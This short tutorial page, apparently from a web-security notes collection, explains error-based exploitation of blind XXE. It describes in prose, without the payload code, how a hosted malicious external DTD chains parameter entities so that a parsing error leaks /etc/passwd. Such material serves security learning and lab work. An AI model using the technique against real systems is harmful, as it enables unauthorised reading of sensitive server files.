Blind XXE to LFI
Last updated
Last updated
An alternative approach to exploit
a Blind XXE is to trigger
an XML parsing error.
Where the error message brings us the sensitive information, might be effective when it's shown in the application's response.
We can trigger an XML parsing error message containing the contents of the /etc/passwd
file using a malicious external DTD
Creates an XML parameter entity called file
, which contains /etc/passwd
Creates an XML parameter entity called eval
, which dynamically contains another entity called error
. Error entity will be evaluated by loading a non-existent file, whose name contains the value of the file
entity
Uses eval entity, which causes the error entity to be performed
Uses error entity, so it attempts to load a non-existent file
Resulting in an error message containing the name of the non-existent file, and gives the contents of /etc/passwd
.
Create a malicious XML entity and host it in your exploit server, save it
Now insert an XML statement invoking the external DTD asusal
We can notice, we get a response giving us the contents of
/etc/passwd